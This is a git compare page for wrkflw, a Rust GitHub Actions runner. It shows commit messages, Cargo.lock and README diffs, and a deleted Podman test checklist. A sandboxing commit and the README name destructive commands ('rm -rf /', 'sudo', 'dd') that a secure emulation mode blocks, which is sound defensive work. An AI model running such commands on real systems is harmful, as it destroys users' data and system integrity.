Compare commits

...

24 Commits

Author SHA1 Message Date
bahdotsh
960f7486a2 Release 0.7.0
wrkflw@0.7.0
wrkflw-evaluator@0.7.0
wrkflw-executor@0.7.0
wrkflw-github@0.7.0
wrkflw-gitlab@0.7.0
wrkflw-logging@0.7.0
wrkflw-matrix@0.7.0
wrkflw-models@0.7.0
wrkflw-parser@0.7.0
wrkflw-runtime@0.7.0
wrkflw-ui@0.7.0
wrkflw-utils@0.7.0
wrkflw-validators@0.7.0

Generated by cargo-workspaces
2025-08-13 18:07:11 +05:30
bahdotsh
cb936cd1af updated publish script 2025-08-13 17:57:44 +05:30
Gokul
625b8111f1 Merge pull request #38 from bahdotsh/improve-tui-help-tab
feat(ui): enhance TUI help tab with comprehensive documentation and s…
2025-08-13 15:29:22 +05:30
bahdotsh
b2b6e9e08d formatted 2025-08-13 15:26:08 +05:30
bahdotsh
86660ae573 feat(ui): enhance TUI help tab with comprehensive documentation and scrolling
- Add comprehensive keyboard shortcut documentation organized in sections
- Implement two-column layout with color-coded sections and emoji icons
- Add scrollable help content with ↑/↓ and k/j key support
- Enhance help overlay with larger modal size and scroll support
- Include detailed explanations of all tabs, runtime modes, and features
- Update status bar with context-aware help instructions
- Add help scroll state management to app state
- Document workflow management, search functionality, and best practices

The help tab now provides a complete guide covering:
- Navigation controls and tab switching
- Workflow selection, execution, and triggering
- Runtime modes (Docker, Podman, Emulation, Secure Emulation)
- Log search and filtering capabilities
- Tab-specific functionality and tips
- Quick actions and keyboard shortcuts
2025-08-13 14:52:10 +05:30
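The scroll support described above (↑/↓ and k/j) reduces to a small clamped offset. A minimal sketch — struct and method names are illustrative, not the actual app-state API:

```rust
// Illustrative help-tab scroll state; names are assumptions, not wrkflw's API.
struct HelpScroll {
    offset: usize,
}

impl HelpScroll {
    // ↓ / j: move down, clamped so we never scroll past the last line.
    fn scroll_down(&mut self, max_offset: usize) {
        self.offset = (self.offset + 1).min(max_offset);
    }
    // ↑ / k: move up, saturating at the top.
    fn scroll_up(&mut self) {
        self.offset = self.offset.saturating_sub(1);
    }
}

fn main() {
    let mut s = HelpScroll { offset: 0 };
    s.scroll_up(); // already at the top: no-op
    assert_eq!(s.offset, 0);
    s.scroll_down(2);
    s.scroll_down(2);
    s.scroll_down(2); // clamped at max_offset
    assert_eq!(s.offset, 2);
}
```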
Gokul
886c415fa7 Merge pull request #37 from bahdotsh/feature/secure-emulation-sandboxing
feat: Add comprehensive sandboxing for secure emulation mode
2025-08-13 14:36:02 +05:30
bahdotsh
460357d9fe feat: Add comprehensive sandboxing for secure emulation mode
Security Features:
- Implement secure emulation runtime with command sandboxing
- Add command validation, filtering, and dangerous pattern detection
- Block harmful commands like 'rm -rf /', 'sudo', 'dd', etc.
- Add resource limits (CPU, memory, execution time, process count)
- Implement filesystem isolation and access controls
- Add environment variable sanitization
- Support shell operators (&&, ||, |, ;) with proper parsing

New Runtime Mode:
- Add 'secure-emulation' runtime option to CLI
- Update UI to support new runtime mode with green security indicator
- Mark legacy 'emulation' mode as unsafe in help text
- Default to secure mode for local development safety

Documentation:
- Create comprehensive security documentation (README_SECURITY.md)
- Update main README with security mode information
- Add example workflows demonstrating safe vs dangerous commands
- Include migration guide and best practices

Testing:
- Add comprehensive test suite for sandbox functionality
- Include security demo workflows for testing
- Test dangerous command blocking and safe command execution
- Verify resource limits and timeout functionality

Code Quality:
- Fix all clippy warnings with proper struct initialization
- Add proper error handling and user-friendly security messages
- Implement comprehensive logging for security events
- Follow Rust best practices throughout

This addresses security concerns by preventing accidental harmful
commands while maintaining full compatibility with legitimate CI/CD
workflows. Users can now safely run untrusted workflows locally
without risk to their host system.
2025-08-13 14:30:51 +05:30
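The command filtering described in this commit can be sketched as a deny-list check. The patterns below are examples only, not the crate's actual list, and the real sandbox also enforces resource limits and filesystem isolation:

```rust
// Illustrative deny-list for secure-emulation mode; patterns are assumptions.
const DANGEROUS_PATTERNS: &[&str] = &["rm -rf /", "sudo ", "dd if=", "mkfs"];

// Reject a command if it contains any dangerous pattern as a substring.
fn is_command_allowed(cmd: &str) -> bool {
    !DANGEROUS_PATTERNS.iter().any(|p| cmd.contains(p))
}

fn main() {
    assert!(is_command_allowed("echo hello"));
    assert!(is_command_allowed("cargo build --release"));
    assert!(!is_command_allowed("sudo rm -rf /"));
    assert!(!is_command_allowed("dd if=/dev/zero of=/dev/sda"));
}
```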
Gokul
096ccfa180 Merge pull request #36 from bahdotsh/feat/validate-multiple-paths
feat(cli): wrkflw validate accepts multiple paths (files/dirs)
2025-08-13 14:11:09 +05:30
bahdotsh
8765537cfa feat(cli): wrkflw validate accepts multiple paths (files/dirs); autodetects GitHub/GitLab per file; --gitlab forces GitLab for all; graceful EPIPE handling when piped; docs updated 2025-08-13 14:06:40 +05:30
Gokul
ac708902ef Merge pull request #35 from bahdotsh/feature/async-log-processing
feat: move log stream composition and filtering to background thread
2025-08-13 13:41:18 +05:30
bahdotsh
d1268d55cf feat: move log stream composition and filtering to background thread
- Resolves #29: UI unresponsiveness in logs tab
- Add LogProcessor with background thread for async log processing
- Implement pre-processed log caching with ProcessedLogEntry
- Replace frame-by-frame log processing with cached results
- Add automatic log change detection for app and system logs
- Optimize rendering from O(n) to O(1) complexity
- Maintain all search, filter, and highlighting functionality
- Fix clippy warning for redundant pattern matching

Performance improvements:
- Log processing moved to separate thread with 50ms debouncing
- UI rendering no longer blocks on log filtering/formatting
- Supports thousands of logs without UI lag
- Non-blocking request/response pattern with mpsc channels
2025-08-13 13:38:17 +05:30
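The non-blocking request/response pattern with mpsc channels mentioned above can be sketched with std primitives. This is a simplified illustration — the real `LogProcessor` also debounces (~50 ms) and caches `ProcessedLogEntry` values:

```rust
use std::sync::mpsc;
use std::thread;

// Illustrative request type; the actual LogProcessor API differs.
enum Request {
    Filter { logs: Vec<String>, query: String },
    Shutdown,
}

// Spawn a background thread that filters logs off the UI thread,
// so rendering only consumes pre-processed results.
fn spawn_log_processor() -> (mpsc::Sender<Request>, mpsc::Receiver<Vec<String>>) {
    let (req_tx, req_rx) = mpsc::channel();
    let (res_tx, res_rx) = mpsc::channel();
    thread::spawn(move || {
        while let Ok(req) = req_rx.recv() {
            match req {
                Request::Filter { logs, query } => {
                    let filtered: Vec<String> = logs
                        .into_iter()
                        .filter(|l| l.contains(query.as_str()))
                        .collect();
                    let _ = res_tx.send(filtered);
                }
                Request::Shutdown => break,
            }
        }
    });
    (req_tx, res_rx)
}

fn main() {
    let (tx, rx) = spawn_log_processor();
    let logs = vec!["INFO start".to_string(), "ERROR boom".to_string()];
    tx.send(Request::Filter { logs, query: "ERROR".into() }).unwrap();
    assert_eq!(rx.recv().unwrap(), vec!["ERROR boom".to_string()]);
    tx.send(Request::Shutdown).unwrap();
}
```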
Gokul
a146d94c35 Merge pull request #34 from bahdotsh/fix/runs-on-array-support
fix: Support array format for runs-on field in GitHub Actions workflows
2025-08-13 13:24:35 +05:30
bahdotsh
7636195380 fix: Support array format for runs-on field in GitHub Actions workflows
- Add custom deserializer for runs-on field to handle both string and array formats
- Update Job struct to use Vec<String> instead of String for runs-on field
- Modify executor to extract first element from runs-on array for runner selection
- Add test workflow to verify both string and array formats work correctly
- Maintain backwards compatibility with existing string-based workflows

Fixes issue where workflows with runs-on: [self-hosted, ubuntu, small] format
would fail with 'invalid type: sequence, expected a string' error.

This change aligns with GitHub Actions specification which supports:
- String format: runs-on: ubuntu-latest
- Array format: runs-on: [self-hosted, ubuntu, small]
2025-08-13 13:21:58 +05:30
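The normalization this commit describes — accepting both string and array forms of `runs-on` and picking the first element for runner selection — can be illustrated with a simplified std-only function (the real fix is a custom serde deserializer on the `Job` struct):

```rust
// Simplified illustration: normalize a raw runs-on value to Vec<String>.
// Handles the flow-sequence form "[a, b, c]" and the bare-string form.
fn normalize_runs_on(raw: &str) -> Vec<String> {
    let raw = raw.trim();
    if let Some(inner) = raw.strip_prefix('[').and_then(|s| s.strip_suffix(']')) {
        inner.split(',').map(|s| s.trim().to_string()).collect()
    } else {
        vec![raw.to_string()]
    }
}

fn main() {
    // String format
    assert_eq!(normalize_runs_on("ubuntu-latest"), vec!["ubuntu-latest"]);
    // Array format from the commit message
    let labels = normalize_runs_on("[self-hosted, ubuntu, small]");
    assert_eq!(labels, vec!["self-hosted", "ubuntu", "small"]);
    // The executor uses the first element for runner selection
    assert_eq!(labels.first().map(String::as_str), Some("self-hosted"));
}
```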
Gokul
98afdb3372 Merge pull request #33 from bahdotsh/docs/add-crate-readmes
docs(readme): add per-crate READMEs and enhance wrkflw crate README
2025-08-12 15:12:44 +05:30
bahdotsh
58de01e69f docs(readme): add per-crate READMEs and enhance wrkflw crate README 2025-08-12 15:09:38 +05:30
Gokul
880cae3899 Merge pull request #32 from bahdotsh/bahdotsh/reusable-workflow-execution
feat: add execution support for reusable workflows
2025-08-12 14:57:49 +05:30
bahdotsh
66e540645d feat(executor,parser,docs): add execution support for reusable workflows (jobs.<id>.uses)

- Parser: make jobs.runs-on optional; add job-level uses/with/secrets for caller jobs
- Executor: resolve and run local/remote called workflows; propagate inputs/secrets; summarize results
- Docs: document feature, usage, and current limits in README
- Tests: add execution tests for local reusable workflows (success/failure)

Limits:
- Does not propagate outputs back to caller
- secrets: inherit not special-cased; use mapping
- Remote private repos not yet supported; public only
- Cycle detection for nested calls unchanged
2025-08-12 14:53:07 +05:30
bahdotsh
79b6389f54 fix: resolve schema file path issues for cargo publish
- Copied schema files into parser crate src directory
- Updated include_str! paths to be relative to source files
- Ensures schemas are bundled with crate during publish
- Resolves packaging and verification issues during publication

Fixes the build error that was preventing crate publication.
2025-08-09 18:14:25 +05:30
bahdotsh
5d55812872 fix: correct schema file paths for cargo publish
- Updated include_str! paths from ../../../ to ../../../../
- This resolves packaging issues during cargo publish
- Fixes schema loading for parser crate publication
2025-08-09 18:12:56 +05:30
bahdotsh
537bf2f9d1 chore: bump version to 0.6.0
- Updated workspace version from 0.5.0 to 0.6.0
- Updated all internal crate dependencies to 0.6.0
- Verified all tests pass and builds succeed
2025-08-09 17:46:09 +05:30
bahdotsh
f0b6633cb8 renamed 2025-08-09 17:03:03 +05:30
bahdotsh
181b5c5463 feat: reorganize test files and delete manual test checklist
- Move test workflows to tests/workflows/
- Move GitLab CI fixtures to tests/fixtures/gitlab-ci/
- Move test scripts to tests/scripts/
- Move Podman testing docs to tests/
- Update paths in test scripts and documentation
- Delete MANUAL_TEST_CHECKLIST.md as requested
- Update tests/README.md to reflect new organization
2025-08-09 15:30:53 +05:30
bahdotsh
1cc3bf98b6 feat: bump version to 0.5.0 for podman support 2025-08-09 15:24:49 +05:30
Gokul
af8ac002e4 Merge pull request #28 from bahdotsh/podman
feat: Add comprehensive Podman container runtime support
2025-08-09 15:11:58 +05:30
104 changed files with 8968 additions and 1140 deletions

Cargo.lock generated

@@ -486,46 +486,6 @@ dependencies = [
"windows-sys 0.59.0",
]
[[package]]
name = "evaluator"
version = "0.4.0"
dependencies = [
"colored",
"models",
"serde_yaml",
"validators",
]
[[package]]
name = "executor"
version = "0.4.0"
dependencies = [
"async-trait",
"bollard",
"chrono",
"dirs",
"futures",
"futures-util",
"lazy_static",
"logging",
"matrix",
"models",
"num_cpus",
"once_cell",
"parser",
"regex",
"runtime",
"serde",
"serde_json",
"serde_yaml",
"tar",
"tempfile",
"thiserror",
"tokio",
"utils",
"uuid",
]
[[package]]
name = "fancy-regex"
version = "0.11.0"
@@ -714,35 +674,6 @@ version = "0.31.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "07e28edb80900c19c28f1072f2e8aeca7fa06b23cd4169cefe1af5aa3260783f"
[[package]]
name = "github"
version = "0.4.0"
dependencies = [
"lazy_static",
"models",
"regex",
"reqwest",
"serde",
"serde_json",
"serde_yaml",
"thiserror",
]
[[package]]
name = "gitlab"
version = "0.4.0"
dependencies = [
"lazy_static",
"models",
"regex",
"reqwest",
"serde",
"serde_json",
"serde_yaml",
"thiserror",
"urlencoding",
]
[[package]]
name = "h2"
version = "0.3.26"
@@ -1215,28 +1146,6 @@ version = "0.4.27"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "13dc2df351e3202783a1fe0d44375f7295ffb4049267b0f3018346dc122a1d94"
[[package]]
name = "logging"
version = "0.4.0"
dependencies = [
"chrono",
"models",
"once_cell",
"serde",
"serde_yaml",
]
[[package]]
name = "matrix"
version = "0.4.0"
dependencies = [
"indexmap 2.8.0",
"models",
"serde",
"serde_yaml",
"thiserror",
]
[[package]]
name = "memchr"
version = "2.7.4"
@@ -1281,16 +1190,6 @@ dependencies = [
"windows-sys 0.52.0",
]
[[package]]
name = "models"
version = "0.4.0"
dependencies = [
"serde",
"serde_json",
"serde_yaml",
"thiserror",
]
[[package]]
name = "native-tls"
version = "0.2.14"
@@ -1511,20 +1410,6 @@ dependencies = [
"windows-targets 0.52.6",
]
[[package]]
name = "parser"
version = "0.4.0"
dependencies = [
"jsonschema",
"matrix",
"models",
"serde",
"serde_json",
"serde_yaml",
"tempfile",
"thiserror",
]
[[package]]
name = "paste"
version = "1.0.15"
@@ -1731,23 +1616,6 @@ dependencies = [
"winreg",
]
[[package]]
name = "runtime"
version = "0.4.0"
dependencies = [
"async-trait",
"futures",
"logging",
"models",
"once_cell",
"serde",
"serde_yaml",
"tempfile",
"tokio",
"utils",
"which",
]
[[package]]
name = "rustc-demangle"
version = "0.1.24"
@@ -2243,28 +2111,6 @@ version = "0.2.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "e421abadd41a4225275504ea4d6566923418b7f05506fbc9c0fe86ba7396114b"
[[package]]
name = "ui"
version = "0.4.0"
dependencies = [
"chrono",
"crossterm 0.26.1",
"evaluator",
"executor",
"futures",
"github",
"logging",
"models",
"ratatui",
"regex",
"reqwest",
"serde",
"serde_json",
"serde_yaml",
"tokio",
"utils",
]
[[package]]
name = "unicode-ident"
version = "1.0.18"
@@ -2324,16 +2170,6 @@ version = "0.2.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "06abde3611657adf66d383f00b093d7faecc7fa57071cce2578660c9f1010821"
[[package]]
name = "utils"
version = "0.4.0"
dependencies = [
"models",
"nix",
"serde",
"serde_yaml",
]
[[package]]
name = "uuid"
version = "1.16.0"
@@ -2343,16 +2179,6 @@ dependencies = [
"getrandom 0.3.2",
]
[[package]]
name = "validators"
version = "0.4.0"
dependencies = [
"matrix",
"models",
"serde",
"serde_yaml",
]
[[package]]
name = "vcpkg"
version = "0.2.15"
@@ -2719,7 +2545,7 @@ checksum = "1e9df38ee2d2c3c5948ea468a8406ff0db0b29ae1ffde1bcf20ef305bcc95c51"
[[package]]
name = "wrkflw"
version = "0.4.0"
version = "0.7.0"
dependencies = [
"bollard",
"chrono",
@@ -2727,41 +2553,217 @@ dependencies = [
"colored",
"crossterm 0.26.1",
"dirs",
"evaluator",
"executor",
"futures",
"futures-util",
"github",
"gitlab",
"indexmap 2.8.0",
"itertools",
"lazy_static",
"libc",
"log",
"logging",
"matrix",
"models",
"nix",
"num_cpus",
"once_cell",
"parser",
"ratatui",
"rayon",
"regex",
"reqwest",
"runtime",
"serde",
"serde_json",
"serde_yaml",
"tempfile",
"thiserror",
"tokio",
"ui",
"urlencoding",
"utils",
"uuid",
"validators",
"walkdir",
"wrkflw-evaluator",
"wrkflw-executor",
"wrkflw-github",
"wrkflw-gitlab",
"wrkflw-logging",
"wrkflw-matrix",
"wrkflw-models",
"wrkflw-parser",
"wrkflw-runtime",
"wrkflw-ui",
"wrkflw-utils",
"wrkflw-validators",
]
[[package]]
name = "wrkflw-evaluator"
version = "0.7.0"
dependencies = [
"colored",
"serde_yaml",
"wrkflw-models",
"wrkflw-validators",
]
[[package]]
name = "wrkflw-executor"
version = "0.7.0"
dependencies = [
"async-trait",
"bollard",
"chrono",
"dirs",
"futures",
"futures-util",
"lazy_static",
"num_cpus",
"once_cell",
"regex",
"serde",
"serde_json",
"serde_yaml",
"tar",
"tempfile",
"thiserror",
"tokio",
"uuid",
"wrkflw-logging",
"wrkflw-matrix",
"wrkflw-models",
"wrkflw-parser",
"wrkflw-runtime",
"wrkflw-utils",
]
[[package]]
name = "wrkflw-github"
version = "0.7.0"
dependencies = [
"lazy_static",
"regex",
"reqwest",
"serde",
"serde_json",
"serde_yaml",
"thiserror",
"wrkflw-models",
]
[[package]]
name = "wrkflw-gitlab"
version = "0.7.0"
dependencies = [
"lazy_static",
"regex",
"reqwest",
"serde",
"serde_json",
"serde_yaml",
"thiserror",
"urlencoding",
"wrkflw-models",
]
[[package]]
name = "wrkflw-logging"
version = "0.7.0"
dependencies = [
"chrono",
"once_cell",
"serde",
"serde_yaml",
"wrkflw-models",
]
[[package]]
name = "wrkflw-matrix"
version = "0.7.0"
dependencies = [
"indexmap 2.8.0",
"serde",
"serde_yaml",
"thiserror",
"wrkflw-models",
]
[[package]]
name = "wrkflw-models"
version = "0.7.0"
dependencies = [
"serde",
"serde_json",
"serde_yaml",
"thiserror",
]
[[package]]
name = "wrkflw-parser"
version = "0.7.0"
dependencies = [
"jsonschema",
"serde",
"serde_json",
"serde_yaml",
"tempfile",
"thiserror",
"wrkflw-matrix",
"wrkflw-models",
]
[[package]]
name = "wrkflw-runtime"
version = "0.7.0"
dependencies = [
"async-trait",
"futures",
"once_cell",
"regex",
"serde",
"serde_yaml",
"tempfile",
"thiserror",
"tokio",
"which",
"wrkflw-logging",
"wrkflw-models",
"wrkflw-utils",
]
[[package]]
name = "wrkflw-ui"
version = "0.7.0"
dependencies = [
"chrono",
"crossterm 0.26.1",
"futures",
"ratatui",
"regex",
"reqwest",
"serde",
"serde_json",
"serde_yaml",
"tokio",
"wrkflw-evaluator",
"wrkflw-executor",
"wrkflw-github",
"wrkflw-logging",
"wrkflw-models",
"wrkflw-utils",
]
[[package]]
name = "wrkflw-utils"
version = "0.7.0"
dependencies = [
"nix",
"serde",
"serde_yaml",
"wrkflw-models",
]
[[package]]
name = "wrkflw-validators"
version = "0.7.0"
dependencies = [
"serde",
"serde_yaml",
"wrkflw-matrix",
"wrkflw-models",
]
[[package]]


@@ -5,7 +5,7 @@ members = [
resolver = "2"
[workspace.package]
version = "0.4.0"
version = "0.7.0"
edition = "2021"
description = "A GitHub Actions workflow validator and executor"
documentation = "https://github.com/bahdotsh/wrkflw"


@@ -1,207 +0,0 @@
# Manual Testing Checklist for Podman Support
## Quick Manual Verification Steps
### ✅ **Step 1: CLI Help and Options**
```bash
./target/release/wrkflw run --help
```
**Verify:**
- [ ] `--runtime` option is present
- [ ] Shows `docker`, `podman`, `emulation` as possible values
- [ ] Default is `docker`
- [ ] Help text explains each option
### ✅ **Step 2: CLI Runtime Selection**
```bash
# Test each runtime option
./target/release/wrkflw run --runtime docker test-workflows/example.yml --verbose
./target/release/wrkflw run --runtime podman test-workflows/example.yml --verbose
./target/release/wrkflw run --runtime emulation test-workflows/example.yml --verbose
# Test invalid runtime (should fail)
./target/release/wrkflw run --runtime invalid test-workflows/example.yml
```
**Verify:**
- [ ] All valid runtimes are accepted
- [ ] Invalid runtime shows clear error message
- [ ] Podman mode shows "Podman: Running container" in verbose logs
- [ ] Emulation mode works without containers
### ✅ **Step 3: TUI Runtime Support**
```bash
./target/release/wrkflw tui test-workflows/
```
**Verify:**
- [ ] TUI starts successfully
- [ ] Status bar shows current runtime (bottom of screen)
- [ ] Press `e` key to cycle through runtimes: Docker → Podman → Emulation → Docker
- [ ] Runtime changes are reflected in status bar
- [ ] Podman shows "Connected" or "Not Available" status
### ✅ **Step 4: TUI Runtime Parameter**
```bash
./target/release/wrkflw tui --runtime podman test-workflows/
./target/release/wrkflw tui --runtime emulation test-workflows/
```
**Verify:**
- [ ] TUI starts with specified runtime
- [ ] Status bar reflects the specified runtime
### ✅ **Step 5: Container Execution Test**
Create a simple test workflow:
```yaml
name: Runtime Test
on: [workflow_dispatch]
jobs:
  test:
    runs-on: ubuntu-latest
    container: ubuntu:20.04
    steps:
      - run: |
          echo "Runtime test execution"
          whoami
          pwd
          echo "Test completed"
```
Test with different runtimes:
```bash
./target/release/wrkflw run --runtime podman test-runtime.yml --verbose
./target/release/wrkflw run --runtime docker test-runtime.yml --verbose
./target/release/wrkflw run --runtime emulation test-runtime.yml --verbose
```
**Verify:**
- [ ] Podman mode runs in containers (shows container logs)
- [ ] Docker mode runs in containers (shows container logs)
- [ ] Emulation mode runs on host system
- [ ] All modes produce similar output
### ✅ **Step 6: Error Handling**
```bash
# Test with Podman unavailable (temporarily rename podman binary)
sudo mv /usr/local/bin/podman /usr/local/bin/podman.tmp 2>/dev/null || echo "podman not in /usr/local/bin"
./target/release/wrkflw run --runtime podman test-runtime.yml
sudo mv /usr/local/bin/podman.tmp /usr/local/bin/podman 2>/dev/null || echo "nothing to restore"
```
**Verify:**
- [ ] Shows "Podman is not available. Using emulation mode instead."
- [ ] Falls back to emulation gracefully
- [ ] Workflow still executes successfully
### ✅ **Step 7: Container Preservation**
```bash
# Create a failing workflow
echo 'name: Fail Test
on: [workflow_dispatch]
jobs:
  fail:
    runs-on: ubuntu-latest
    container: ubuntu:20.04
    steps:
      - run: exit 1' > test-fail.yml
# Test with preservation
./target/release/wrkflw run --runtime podman --preserve-containers-on-failure test-fail.yml
# Check for preserved containers
podman ps -a --filter "name=wrkflw-"
```
**Verify:**
- [ ] Failed container is preserved when flag is used
- [ ] Container can be inspected with `podman exec -it <container> bash`
- [ ] Without flag, containers are cleaned up
### ✅ **Step 8: Documentation**
**Verify:**
- [ ] README.md mentions Podman support
- [ ] Examples show `--runtime podman` usage
- [ ] TUI keybind documentation mentions runtime cycling
- [ ] Installation instructions for Podman are present
## Platform-Specific Tests
### **Linux:**
- [ ] Podman works rootless
- [ ] No sudo required for container operations
- [ ] Network connectivity works in containers
### **macOS:**
- [ ] Podman machine is initialized and running
- [ ] Container execution works correctly
- [ ] Volume mounting works for workspace
### **Windows:**
- [ ] Podman Desktop or CLI is installed
- [ ] Basic container operations work
- [ ] Workspace mounting functions correctly
## Performance and Resource Tests
### **Memory Usage:**
```bash
# Monitor memory during execution
./target/release/wrkflw run --runtime podman test-runtime.yml &
PID=$!
while kill -0 $PID 2>/dev/null; do
  ps -p $PID -o pid,ppid,pgid,sess,cmd,%mem,%cpu
  sleep 2
done
```
**Verify:**
- [ ] Memory usage is reasonable
- [ ] No memory leaks during execution
### **Container Cleanup:**
```bash
# Run multiple workflows and check cleanup
for i in {1..3}; do
  ./target/release/wrkflw run --runtime podman test-runtime.yml
done
podman ps -a --filter "name=wrkflw-"
```
**Verify:**
- [ ] No containers remain after execution
- [ ] Cleanup is thorough and automatic
## Integration Tests
### **Complex Workflow:**
Test with a workflow that has:
- [ ] Multiple jobs
- [ ] Environment variables
- [ ] File operations
- [ ] Network access
- [ ] Package installation
### **Edge Cases:**
- [ ] Very long-running containers
- [ ] Large output logs
- [ ] Network-intensive operations
- [ ] File system intensive operations
## Final Verification
**Overall System Check:**
- [ ] All runtimes work as expected
- [ ] Error messages are clear and helpful
- [ ] Performance is acceptable
- [ ] User experience is smooth
- [ ] Documentation is accurate and complete
**Sign-off:**
- [ ] Basic functionality: ✅ PASS / ❌ FAIL
- [ ] CLI integration: ✅ PASS / ❌ FAIL
- [ ] TUI integration: ✅ PASS / ❌ FAIL
- [ ] Error handling: ✅ PASS / ❌ FAIL
- [ ] Documentation: ✅ PASS / ❌ FAIL
**Notes:**
_Add any specific issues, observations, or platform-specific notes here._
---
**Testing completed by:** ________________
**Date:** ________________
**Platform:** ________________
**Podman version:** ________________


@@ -26,6 +26,7 @@ WRKFLW is a powerful command-line tool for validating and executing GitHub Actio
- Composite actions
- Local actions
- **Special Action Handling**: Native handling for commonly used actions like `actions/checkout`
- **Reusable Workflows (Caller Jobs)**: Execute jobs that call reusable workflows via `jobs.<id>.uses` (local path or `owner/repo/path@ref`)
- **Output Capturing**: View logs, step outputs, and execution details
- **Parallel Job Execution**: Runs independent jobs in parallel for faster workflow execution
- **Trigger Workflows Remotely**: Manually trigger workflow runs on GitHub or GitLab
@@ -110,6 +111,12 @@ wrkflw validate path/to/workflow.yml
# Validate workflows in a specific directory
wrkflw validate path/to/workflows
# Validate multiple files and/or directories (GitHub and GitLab are auto-detected)
wrkflw validate path/to/flow-1.yml path/to/flow-2.yml path/to/workflows
# Force GitLab parsing for all provided paths
wrkflw validate --gitlab .gitlab-ci.yml other.gitlab-ci.yml
# Validate with verbose output
wrkflw validate --verbose path/to/workflow.yml
@@ -372,6 +379,7 @@ podman ps -a --filter "name=wrkflw-" --format "{{.Names}}" | xargs podman rm -f
- ✅ Composite actions (all composite actions, including nested and local composite actions, are supported)
- ✅ Local actions (actions referenced with local paths are supported)
- ✅ Special handling for common actions (e.g., `actions/checkout` is natively supported)
- ✅ Reusable workflows (caller): Jobs that use `jobs.<id>.uses` to call local or remote workflows are executed; inputs and secrets are propagated to the called workflow
- ✅ Workflow triggering via `workflow_dispatch` (manual triggering of workflows is supported)
- ✅ GitLab pipeline triggering (manual triggering of GitLab pipelines is supported)
- ✅ Environment files (`GITHUB_OUTPUT`, `GITHUB_ENV`, `GITHUB_PATH`, `GITHUB_STEP_SUMMARY` are fully supported)
@@ -395,23 +403,68 @@ podman ps -a --filter "name=wrkflw-" --format "{{.Names}}" | xargs podman rm -f
- ❌ Job/step timeouts: Custom timeouts for jobs and steps are NOT enforced.
- ❌ Job/step concurrency and cancellation: Features like `concurrency` and job cancellation are NOT supported.
- ❌ Expressions and advanced YAML features: Most common expressions are supported, but some advanced or edge-case expressions may not be fully implemented.
- ⚠️ Reusable workflows (limits):
  - Outputs from called workflows are not propagated back to the caller (`needs.<id>.outputs.*` not supported)
  - `secrets: inherit` is not special-cased; provide a mapping to pass secrets
  - Remote calls clone public repos via HTTPS; private repos require preconfigured access (not yet implemented)
  - Deeply nested reusable calls work but lack cycle detection beyond regular job dependency checks
## Reusable Workflows
WRKFLW supports executing reusable workflow caller jobs.
### Syntax
```yaml
jobs:
  call-local:
    uses: ./.github/workflows/shared.yml
  call-remote:
    uses: my-org/my-repo/.github/workflows/shared.yml@v1
    with:
      foo: bar
    secrets:
      token: ${{ secrets.MY_TOKEN }}
```
### Behavior
- Local references are resolved relative to the current working directory.
- Remote references are shallow-cloned at the specified `@ref` into a temporary directory.
- `with:` entries are exposed to the called workflow as environment variables `INPUT_<KEY>`.
- `secrets:` mapping entries are exposed as environment variables `SECRET_<KEY>`.
- The called workflow executes according to its own `jobs`/`needs`; a summary of its job results is reported as a single result for the caller job.
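The `INPUT_<KEY>`/`SECRET_<KEY>` mapping above can be sketched as a simple key transform. Note the uppercasing and `-` → `_` normalization here is an assumption for illustration; the behavior notes only specify the prefixes:

```rust
// Illustrative helper (not wrkflw's actual API): map a with:/secrets: entry
// to the environment variable exposed to the called workflow.
// Assumption: keys are uppercased and dashes become underscores.
fn to_env(prefix: &str, key: &str, value: &str) -> (String, String) {
    let name = format!("{}_{}", prefix, key.to_uppercase().replace('-', "_"));
    (name, value.to_string())
}

fn main() {
    assert_eq!(
        to_env("INPUT", "foo", "bar"),
        ("INPUT_FOO".to_string(), "bar".to_string())
    );
    assert_eq!(
        to_env("SECRET", "token", "s3cr3t"),
        ("SECRET_TOKEN".to_string(), "s3cr3t".to_string())
    );
}
```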
### Current limitations
- Outputs from called workflows are not surfaced back to the caller.
- `secrets: inherit` is not supported; specify an explicit mapping.
- Private repositories for remote `uses:` are not yet supported.
### Runtime Mode Differences
- **Docker Mode**: Provides the closest match to GitHub's environment, including support for Docker container actions, service containers, and Linux-based jobs. Some advanced container configurations may still require manual setup.
- **Podman Mode**: Similar to Docker mode but uses Podman for container execution. Offers rootless container support and enhanced security. Fully compatible with Docker-based workflows.
- **Emulation Mode**: Runs workflows using the local system tools. Limitations:
- **🔒 Secure Emulation Mode**: Runs workflows on the local system with comprehensive sandboxing for security. **Recommended for local development**:
  - Command validation and filtering (blocks dangerous commands like `rm -rf /`, `sudo`, etc.)
  - Resource limits (CPU, memory, execution time)
  - Filesystem access controls
  - Process monitoring and limits
  - Safe for running untrusted workflows locally
- **⚠️ Emulation Mode (Legacy)**: Runs workflows using local system tools without sandboxing. **Not recommended - use Secure Emulation instead**:
  - Only supports local and JavaScript actions (no Docker container actions)
  - No support for service containers
  - No caching support
  - **No security protections - can execute harmful commands**
  - Some actions may require adaptation to work locally
  - Special action handling is more limited
### Best Practices
- Test workflows in both Docker and emulation modes to ensure compatibility
- **Use Secure Emulation mode for local development** - provides safety without container overhead
- Test workflows in multiple runtime modes to ensure compatibility
- **Use Docker/Podman mode for production** - provides maximum isolation and reproducibility
- Keep matrix builds reasonably sized for better performance
- Use environment variables instead of GitHub secrets when possible
- Consider using local actions for complex custom functionality
- Test network-dependent actions carefully in both modes
- **Review security warnings** - pay attention to blocked commands in secure emulation mode
- **Start with secure mode** - only fall back to legacy emulation if necessary
## Roadmap


@@ -1,15 +1,20 @@
[package]
name = "evaluator"
name = "wrkflw-evaluator"
version.workspace = true
edition.workspace = true
description = "Workflow evaluation for wrkflw"
description = "Workflow evaluation functionality for wrkflw execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
validators = { path = "../validators" }
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-validators = { path = "../validators", version = "0.7.0" }
# External dependencies
colored.workspace = true
serde_yaml.workspace = true
serde_yaml.workspace = true


@@ -0,0 +1,29 @@
## wrkflw-evaluator
Small, focused helper for statically evaluating GitHub Actions workflow files.
- **Purpose**: Fast structural checks (e.g., `name`, `on`, `jobs`) before deeper validation/execution
- **Used by**: `wrkflw` CLI and TUI during validation flows
### Example
```rust
use std::path::Path;
